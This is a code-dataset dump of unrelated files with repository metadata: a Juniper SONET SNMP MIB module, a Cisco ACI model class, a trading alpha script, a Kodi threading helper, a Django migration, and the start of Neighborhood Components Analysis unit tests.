if mibBuilder.loadTexts: juniSonetAgent.setRevisionsDescriptions(('APS-MIB - mib added.', 'Juniper-UNI-SONET-MIB: Added path event status and notification support.', 'Juniper-UNI-SONET-MIB: Replaced Unisphere names with Juniper names.', 'APS-MIB-JUNI: Added support for IETF draft-ietf-atommib-sonetaps-mib-05 as a Juniper experimental MIB.', 'Separate out the SONET VT support.', 'The initial release of this management information module.',))
if mibBuilder.loadTexts: juniSonetAgent.setLastUpdated('200509152026Z')
if mibBuilder.loadTexts: juniSonetAgent.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: juniSonetAgent.setContactInfo(' Juniper Networks, Inc. Postal: 10 Technology Park Drive Westford, MA 01886-3146 USA Tel: +1 978 589 5800 E-mail: [email protected]')
if mibBuilder.loadTexts: juniSonetAgent.setDescription('The agent capabilities definitions for the SONET component of the SNMP agent in the Juniper E-series family of products.')
juniSonetAgentV1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV1 = juniSonetAgentV1.setProductRelease('Version 1 of the SONET component of the JUNOSe SNMP agent. This\n version of the SONET component was supported in JUNOSe 1.x system\n releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV1 = juniSonetAgentV1.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetAgentV1.setDescription('The MIBs supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when support for the standard VT group was added.')
juniSonetAgentV2 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 2))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV2 = juniSonetAgentV2.setProductRelease('Version 2 of the SONET component of the JUNOSe SNMP agent. This\n version of the SONET component was supported in JUNOSe 2.x system\n releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV2 = juniSonetAgentV2.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetAgentV2.setDescription('The MIBs supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when support for the proprietary path and VT groups were added.')
juniSonetAgentV3 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 3))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV3 = juniSonetAgentV3.setProductRelease('Version 3 of the SONET component of the JUNOSe SNMP agent. This\n version of the SONET component was supported in JUNOSe 3.0 and 3.1\n system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV3 = juniSonetAgentV3.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetAgentV3.setDescription('The MIBs supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when support for the RFC-2558 version of the SONET-MIB and far-end statistics were added.')
juniSonetAgentV4 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 4))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV4 = juniSonetAgentV4.setProductRelease('Version 4 of the SONET component of the JUNOSe SNMP agent. This\n version of the SONET component was supported in JUNOSe 3.2 system\n releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV4 = juniSonetAgentV4.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetAgentV4.setDescription('The MIBs supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when Virtual Tributary (VT) support was searated out into a separate capabilities statement.')
juniSonetBasicAgent = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5))
juniSonetBasicAgentV1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV1 = juniSonetBasicAgentV1.setProductRelease('Version 1 of the basic SONET component of the JUNOSe SNMP agent. It\n does not include Virtual Tributary (VT) support. This version of the\n basic SONET component was supported in JUNOSe 3.3 and subsequent 3.x\n system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV1 = juniSonetBasicAgentV1.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetBasicAgentV1.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when support was added for the Internet draft of the APS MIB.')
juniSonetBasicAgentV2 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5, 2))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV2 = juniSonetBasicAgentV2.setProductRelease('Version 2 of the basic SONET component of the JUNOSe SNMP agent. It\n does not include Virtual Tributary (VT) support. This version of the\n basic SONET component was supported in JUNOSe 4.x system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV2 = juniSonetBasicAgentV2.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetBasicAgentV2.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when new medium and path controls were added.')
juniSonetBasicAgentV3 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5, 3))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV3 = juniSonetBasicAgentV3.setProductRelease('Version 3 of the basic SONET component of the JUNOSe SNMP agent. It\n does not include Virtual Tributary (VT) support. This version of the\n basic SONET component was supported in JUNOSe 5.0 system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV3 = juniSonetBasicAgentV3.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetBasicAgentV3.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when path event status and notification support was added.')
juniSonetBasicAgentV4 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5, 4))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV4 = juniSonetBasicAgentV4.setProductRelease('Version 4 of the basic SONET component of the JUNOSe SNMP agent. It\n does not include Virtual Tributary (VT) support. This version of the\n basic SONET component is supported in JUNOSe 5.1 and subsequent system\n releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV4 = juniSonetBasicAgentV4.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetBasicAgentV4.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe.')
juniSonetBasicAgentV5 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5, 5))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV5 = juniSonetBasicAgentV5.setProductRelease('Version 5 of the basic SONET component of the JUNOSe SNMP agent. It\n does not include Virtual Tributary (VT) support. This version of the\n basic SONET component is supported in JUNOSe 7.2 and subsequent system\n releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV5 = juniSonetBasicAgentV5.setStatus('current')
if mibBuilder.loadTexts: juniSonetBasicAgentV5.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe.')
juniSonetVTAgent = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 6))
juniSonetVTAgentV1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 6, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetVTAgentV1 = juniSonetVTAgentV1.setProductRelease('Version 1 of the SONET VT component of the JUNOSe SNMP agent. This\n version of the SONET component is supported in JUNOSe 3.3 and subsequent\n system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetVTAgentV1 = juniSonetVTAgentV1.setStatus('current')
if mibBuilder.loadTexts: juniSonetVTAgentV1.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe.')
mibBuilder.exportSymbols("Juniper-SONET-CONF", juniSonetAgent=juniSonetAgent, juniSonetBasicAgentV3=juniSonetBasicAgentV3, juniSonetAgentV4=juniSonetAgentV4, PYSNMP_MODULE_ID=juniSonetAgent, juniSonetBasicAgentV5=juniSonetBasicAgentV5, juniSonetAgentV1=juniSonetAgentV1, juniSonetBasicAgentV1=juniSonetBasicAgentV1, juniSonetAgentV3=juniSonetAgentV3, juniSonetBasicAgentV4=juniSonetBasicAgentV4, juniSonetAgentV2=juniSonetAgentV2, juniSonetVTAgentV1=juniSonetVTAgentV1, juniSonetBasicAgent=juniSonetBasicAgent, juniSonetBasicAgentV2=juniSonetBasicAgentV2, juniSonetVTAgent=juniSonetVTAgent)
| [
"[email protected]"
] | |
ec1a2c058317b511d0867d6fd68a928832eda934 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib64/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/fv/rsctxtoospfctxpol.py | 24471250b333be80cb7836f09ea259df48c17457 | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 9,042 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class RsCtxToOspfCtxPol(Mo):
"""
A source relation to the per-address family OSPF context policy.
"""
meta = NamedSourceRelationMeta("cobra.model.fv.RsCtxToOspfCtxPol", "cobra.model.ospf.CtxPol")
meta.targetNameProps["name"] = "tnOspfCtxPolName"
meta.cardinality = SourceRelationMeta.N_TO_M
meta.moClassName = "fvRsCtxToOspfCtxPol"
meta.rnFormat = "rsctxToOspfCtxPol-[%(tnOspfCtxPolName)s]-%(af)s"
meta.category = MoCategory.RELATIONSHIP_TO_LOCAL
meta.label = "OSPF Context Policy"
meta.writeAccessMask = 0x2001
meta.readAccessMask = 0x2001
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = True
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Inst")
meta.childClasses.add("cobra.model.fault.Counts")
meta.childClasses.add("cobra.model.health.Inst")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Counts", "fltCnts"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Inst", "fault-"))
meta.childNamesAndRnPrefix.append(("cobra.model.health.Inst", "health"))
meta.parentClasses.add("cobra.model.fv.Ctx")
meta.superClasses.add("cobra.model.reln.Inst")
meta.superClasses.add("cobra.model.reln.To")
meta.superClasses.add("cobra.model.pol.NToRef")
meta.rnPrefixes = [
('rsctxToOspfCtxPol-', True),
('-', True),
]
prop = PropMeta("str", "af", "af", 17597, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.defaultValue = 2
prop.defaultValueStr = "ipv6-ucast"
prop._addConstant("ipv4-ucast", "ipv4-unicast-address-family", 1)
prop._addConstant("ipv6-ucast", "ipv6-unicast-address-family", 2)
meta.props.add("af", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "forceResolve", "forceResolve", 107, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = True
prop.defaultValueStr = "yes"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("forceResolve", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "monPolDn", "monPolDn", 17603, PropCategory.REGULAR)
prop.label = "Monitoring policy attached to this observable object"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("monPolDn", prop)
prop = PropMeta("str", "rType", "rType", 106, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 1
prop.defaultValueStr = "mo"
prop._addConstant("local", "local", 3)
prop._addConstant("mo", "mo", 1)
prop._addConstant("service", "service", 2)
meta.props.add("rType", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "state", "state", 103, PropCategory.REGULAR)
prop.label = "State"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "unformed"
prop._addConstant("cardinality-violation", "cardinality-violation", 5)
prop._addConstant("formed", "formed", 1)
prop._addConstant("invalid-target", "invalid-target", 4)
prop._addConstant("missing-target", "missing-target", 2)
prop._addConstant("unformed", "unformed", 0)
meta.props.add("state", prop)
prop = PropMeta("str", "stateQual", "stateQual", 104, PropCategory.REGULAR)
prop.label = "State Qualifier"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "none"
prop._addConstant("default-target", "default-target", 2)
prop._addConstant("mismatch-target", "mismatch-target", 1)
prop._addConstant("none", "none", 0)
meta.props.add("stateQual", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "tCl", "tCl", 17599, PropCategory.REGULAR)
prop.label = "Target-class"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 1416
prop.defaultValueStr = "ospfCtxPol"
prop._addConstant("ospfCtxPol", None, 1416)
prop._addConstant("unspecified", "unspecified", 0)
meta.props.add("tCl", prop)
prop = PropMeta("str", "tContextDn", "tContextDn", 4990, PropCategory.REGULAR)
prop.label = "Target-context"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("tContextDn", prop)
prop = PropMeta("str", "tDn", "tDn", 100, PropCategory.REGULAR)
prop.label = "Target-dn"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("tDn", prop)
prop = PropMeta("str", "tRn", "tRn", 4989, PropCategory.REGULAR)
prop.label = "Target-rn"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 512)]
meta.props.add("tRn", prop)
prop = PropMeta("str", "tType", "tType", 4988, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "name"
prop._addConstant("all", "all", 2)
prop._addConstant("mo", "mo", 1)
prop._addConstant("name", "name", 0)
meta.props.add("tType", prop)
prop = PropMeta("str", "tnOspfCtxPolName", "tnOspfCtxPolName", 17598, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.range = [(1, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("tnOspfCtxPolName", prop)
prop = PropMeta("str", "uid", "uid", 8, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("uid", prop)
meta.namingProps.append(getattr(meta.props, "tnOspfCtxPolName"))
getattr(meta.props, "tnOspfCtxPolName").needDelimiter = True
meta.namingProps.append(getattr(meta.props, "af"))
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("CtxToNwIf", "Private Network to Interface", "cobra.model.nw.If"))
def __init__(self, parentMoOrDn, tnOspfCtxPolName, af, markDirty=True, **creationProps):
namingVals = [tnOspfCtxPolName, af]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
3705d6628ca7f9c0175c12c5e79138b0bc3be4c0 | 1eee2c9c105148904d0fb47cee227cfd20241b76 | /alpha/alpha_beats_28.py | 5bfdccc7f1e53b5628dc5209c82fea3bfca59b63 | [] | no_license | fred-hz/zeta | be9f6f466b75767cc1a45a4004d1c84e5d559b6b | e7b631447fff6e58928d6ac15702338b7cc8e3e7 | refs/heads/master | 2021-09-05T01:03:31.387379 | 2018-01-23T04:15:58 | 2018-01-23T04:15:58 | 118,187,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,281 | py | from alpha.alpha_base import AlphaBase
import numpy as np
import util
class AlphaBeats_28(AlphaBase):
def initialize(self):
self.delay = int(self.params['delay'])
self.is_valid = self.context.is_valid
self.alpha = self.context.alpha
self.cps = self.context.fetch_data('adj_close')
self.low = self.context.fetch_data('adj_low')
def compute_day(self, di):
indicator = np.zeros(len(self.context.ii_list))
indicator.flat = np.nan
for ii in range(len(self.context.ii_list)):
if self.is_valid[di][ii]:
if np.where(-np.isnan(self.low[di - self.delay - np.arange(20), ii]))[0].size == 0:
continue
indicator[ii] = np.nanargmin(self.low[di-self.delay-np.arange(20), ii])
util.rank(indicator)
for ii in range(len(self.context.ii_list)):
if self.is_valid[di][ii]:
temp = np.nanmean(self.cps[di-self.delay-np.arange(5), ii])
if abs(temp) > 1e-5:
self.alpha[ii] = (temp - self.cps[di-self.delay][ii]) / temp * (indicator - 0.5)
def dependencies(self):
self.register_dependency('adj_close')
self.register_dependency('adj_low') | [
"[email protected]"
] | |
5f042357ce4755b0b73969f346665bf0304b6569 | 7d8a4d58fc4c5a73ce8c85e513253a86d6290d3b | /script.module.eggscrapers/lib/eggscrapers/modules/workers.py | 0699f6d316130d4fa9ee280485fcae4f73959dcd | [] | no_license | bopopescu/icon | cda26d4463d264b7e2080da51f29d84cc48dfb81 | e385a6225dd11b7fea5a11215d655cf5006bb018 | refs/heads/master | 2022-01-12T19:00:04.951604 | 2019-07-10T05:35:44 | 2019-07-10T05:35:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 946 | py | # -*- coding: utf-8 -*-
'''
Eggman Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import threading
class Thread(threading.Thread):
def __init__(self, target, *args):
self._target = target
self._args = args
threading.Thread.__init__(self)
def run(self):
self._target(*self._args)
| [
"[email protected]"
] | |
9500aa334d1daba13d7d173c5f462b375f143dd5 | d063684dd03293eb0f980568af088d26ab087dbe | /debadmin/migrations/0075_auto_20191108_1225.py | dd5f3b44bf87cdc1a4bd8999b7965e71e5bee1f2 | [] | no_license | abhaysantra/debscientific | ce88e5ef44da8d6771c3652ed0ad02900ccd8ed2 | 88ec65616fd24052bbdbba8b00beba85493f5aea | refs/heads/master | 2020-11-26T22:09:33.820247 | 2019-12-20T07:58:43 | 2019-12-20T07:58:43 | 229,213,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,072 | py | # Generated by Django 2.2.6 on 2019-11-08 06:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('debadmin', '0074_auto_20191107_1914'),
]
operations = [
migrations.AddField(
model_name='order_details',
name='cancel_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='cancel_reason',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='order_details',
name='deliver_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='return_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='return_reason',
field=models.TextField(null=True),
),
]
| [
"[email protected]"
] | |
3aa97b853fd98ddf44122b5bcd60123d34d92249 | 162e0e4791188bd44f6ce5225ff3b1f0b1aa0b0d | /mrex/neighbors/tests/test_nca.py | aae03f4cc2ab2f30e92c437813adba3fbbd1ac11 | [] | no_license | testsleeekGithub/trex | 2af21fa95f9372f153dbe91941a93937480f4e2f | 9d27a9b44d814ede3996a37365d63814214260ae | refs/heads/master | 2020-08-01T11:47:43.926750 | 2019-11-06T06:47:19 | 2019-11-06T06:47:19 | 210,987,245 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,758 | py | # coding: utf-8
"""
Testing for Neighborhood Component Analysis module (mrex.neighbors.nca)
"""
# Authors: William de Vazelhes <[email protected]>
# John Chiotellis <[email protected]>
# License: BSD 3 clause
import pytest
import re
import numpy as np
from numpy.testing import assert_array_equal, assert_array_almost_equal
from scipy.optimize import check_grad
from mrex import clone
from mrex.exceptions import ConvergenceWarning
from mrex.utils import check_random_state
from mrex.utils.testing import (assert_raises,
assert_raise_message, assert_warns_message)
from mrex.datasets import load_iris, make_classification, make_blobs
from mrex.neighbors.nca import NeighborhoodComponentsAnalysis
from mrex.metrics import pairwise_distances
rng = check_random_state(0)
# load and shuffle iris dataset
iris = load_iris()
perm = rng.permutation(iris.target.size)
iris_data = iris.data[perm]
iris_target = iris.target[perm]
EPS = np.finfo(float).eps
def test_simple_example():
"""Test on a simple example.
Puts four points in the input space where the opposite labels points are
next to each other. After transform the samples from the same class
should be next to each other.
"""
X = np.array([[0, 0], [0, 1], [2, 0], [2, 1]])
y = np.array([1, 0, 1, 0])
nca = NeighborhoodComponentsAnalysis(n_components=2, init='identity',
random_state=42)
nca.fit(X, y)
X_t = nca.transform(X)
assert_array_equal(pairwise_distances(X_t).argsort()[:, 1],
np.array([2, 3, 0, 1]))
def test_toy_example_collapse_points():
"""Test on a toy example of three points that should collapse
We build a simple example: two points from the same class and a point from
a different class in the middle of them. On this simple example, the new
(transformed) points should all collapse into one single point. Indeed, the
objective is 2/(1 + exp(d/2)), with d the euclidean distance between the
two samples from the same class. This is maximized for d=0 (because d>=0),
with an objective equal to 1 (loss=-1.).
"""
rng = np.random.RandomState(42)
input_dim = 5
two_points = rng.randn(2, input_dim)
X = np.vstack([two_points, two_points.mean(axis=0)[np.newaxis, :]])
y = [0, 0, 1]
class LossStorer:
def __init__(self, X, y):
self.loss = np.inf # initialize the loss to very high
# Initialize a fake NCA and variables needed to compute the loss:
self.fake_nca = NeighborhoodComponentsAnalysis()
self.fake_nca.n_iter_ = np.inf
self.X, y, _ = self.fake_nca._validate_params(X, y)
self.same_class_mask = y[:, np.newaxis] == y[np.newaxis, :]
def callback(self, transformation, n_iter):
"""Stores the last value of the loss function"""
self.loss, _ = self.fake_nca._loss_grad_lbfgs(transformation,
self.X,
self.same_class_mask,
-1.0)
loss_storer = LossStorer(X, y)
nca = NeighborhoodComponentsAnalysis(random_state=42,
callback=loss_storer.callback)
X_t = nca.fit_transform(X, y)
print(X_t)
# test that points are collapsed into one point
assert_array_almost_equal(X_t - X_t[0], 0.)
assert abs(loss_storer.loss + 1) < 1e-10
def test_finite_differences():
"""Test gradient of loss function
Assert that the gradient is almost equal to its finite differences
approximation.
"""
# Initialize the transformation `M`, as well as `X` and `y` and `NCA`
rng = np.random.RandomState(42)
X, y = make_classification()
M = rng.randn(rng.randint(1, X.shape[1] + 1),
X.shape[1])
nca = NeighborhoodComponentsAnalysis()
nca.n_iter_ = 0
mask = y[:, np.newaxis] == y[np.newaxis, :]
def fun(M):
return nca._loss_grad_lbfgs(M, X, mask)[0]
def grad(M):
return nca._loss_grad_lbfgs(M, X, mask)[1]
# compute relative error
rel_diff = check_grad(fun, grad, M.ravel()) / np.linalg.norm(grad(M))
np.testing.assert_almost_equal(rel_diff, 0., decimal=5)
def test_params_validation():
# Test that invalid parameters raise value error
X = np.arange(12).reshape(4, 3)
y = [1, 1, 2, 2]
NCA = NeighborhoodComponentsAnalysis
rng = np.random.RandomState(42)
# TypeError
assert_raises(TypeError, NCA(max_iter='21').fit, X, y)
assert_raises(TypeError, NCA(verbose='true').fit, X, y)
assert_raises(TypeError, NCA(tol='1').fit, X, y)
assert_raises(TypeError, NCA(n_components='invalid').fit, X, y)
assert_raises(TypeError, NCA(warm_start=1).fit, X, y)
# ValueError
assert_raise_message(ValueError,
"`init` must be 'auto', 'pca', 'lda', 'identity', "
"'random' or a numpy array of shape "
"(n_components, n_features).",
NCA(init=1).fit, X, y)
assert_raise_message(ValueError,
'`max_iter`= -1, must be >= 1.',
NCA(max_iter=-1).fit, X, y)
init = rng.rand(5, 3)
assert_raise_message(ValueError,
'The output dimensionality ({}) of the given linear '
'transformation `init` cannot be greater than its '
'input dimensionality ({}).'
.format(init.shape[0], init.shape[1]),
NCA(init=init).fit, X, y)
n_components = 10
assert_raise_message(ValueError,
'The preferred dimensionality of the '
'projected space `n_components` ({}) cannot '
'be greater than the given data '
'dimensionality ({})!'
.format(n_components, X.shape[1]),
NCA(n_components=n_components).fit, X, y)
def test_transformation_dimensions():
X = np.arange(12).reshape(4, 3)
y = [1, 1, 2, 2]
# Fail if transformation input dimension does not match inputs dimensions
transformation = np.array([[1, 2], [3, 4]])
assert_raises(ValueError,
NeighborhoodComponentsAnalysis(init=transformation).fit,
X, y)
# Fail if transformation output dimension is larger than
# transformation input dimension
transformation = np.array([[1, 2], [3, 4], [5, 6]])
# len(transformation) > len(transformation[0])
assert_raises(ValueError,
NeighborhoodComponentsAnalysis(init=transformation).fit,
X, y)
# Pass otherwise
transformation = np.arange(9).reshape(3, 3)
NeighborhoodComponentsAnalysis(init=transformation).fit(X, y)
def test_n_components():
rng = np.random.RandomState(42)
X = np.arange(12).reshape(4, 3)
y = [1, 1, 2, 2]
init = rng.rand(X.shape[1] - 1, 3)
# n_components = X.shape[1] != transformation.shape[0]
n_components = X.shape[1]
nca = NeighborhoodComponentsAnalysis(init=init, n_components=n_components)
assert_raise_message(ValueError,
'The preferred dimensionality of the '
'projected space `n_components` ({}) does not match '
'the output dimensionality of the given '
'linear transformation `init` ({})!'
.format(n_components, init.shape[0]),
nca.fit, X, y)
# n_components > X.shape[1]
n_components = X.shape[1] + 2
nca = NeighborhoodComponentsAnalysis(init=init, n_components=n_components)
assert_raise_message(ValueError,
'The preferred dimensionality of the '
'projected space `n_components` ({}) cannot '
'be greater than the given data '
'dimensionality ({})!'
.format(n_components, X.shape[1]),
nca.fit, X, y)
# n_components < X.shape[1]
nca = NeighborhoodComponentsAnalysis(n_components=2, init='identity')
nca.fit(X, y)
def test_init_transformation():
rng = np.random.RandomState(42)
X, y = make_blobs(n_samples=30, centers=6, n_features=5, random_state=0)
# Start learning from scratch
nca = NeighborhoodComponentsAnalysis(init='identity')
nca.fit(X, y)
# Initialize with random
nca_random = NeighborhoodComponentsAnalysis(init='random')
nca_random.fit(X, y)
# Initialize with auto
nca_auto = NeighborhoodComponentsAnalysis(init='auto')
nca_auto.fit(X, y)
# Initialize with PCA
nca_pca = NeighborhoodComponentsAnalysis(init='pca')
nca_pca.fit(X, y)
# Initialize with LDA
nca_lda = NeighborhoodComponentsAnalysis(init='lda')
nca_lda.fit(X, y)
init = rng.rand(X.shape[1], X.shape[1])
nca = NeighborhoodComponentsAnalysis(init=init)
nca.fit(X, y)
# init.shape[1] must match X.shape[1]
init = rng.rand(X.shape[1], X.shape[1] + 1)
nca = NeighborhoodComponentsAnalysis(init=init)
assert_raise_message(ValueError,
'The input dimensionality ({}) of the given '
'linear transformation `init` must match the '
'dimensionality of the given inputs `X` ({}).'
.format(init.shape[1], X.shape[1]),
nca.fit, X, y)
# init.shape[0] must be <= init.shape[1]
init = rng.rand(X.shape[1] + 1, X.shape[1])
nca = NeighborhoodComponentsAnalysis(init=init)
assert_raise_message(ValueError,
'The output dimensionality ({}) of the given '
'linear transformation `init` cannot be '
'greater than its input dimensionality ({}).'
.format(init.shape[0], init.shape[1]),
nca.fit, X, y)
# init.shape[0] must match n_components
init = rng.rand(X.shape[1], X.shape[1])
n_components = X.shape[1] - 2
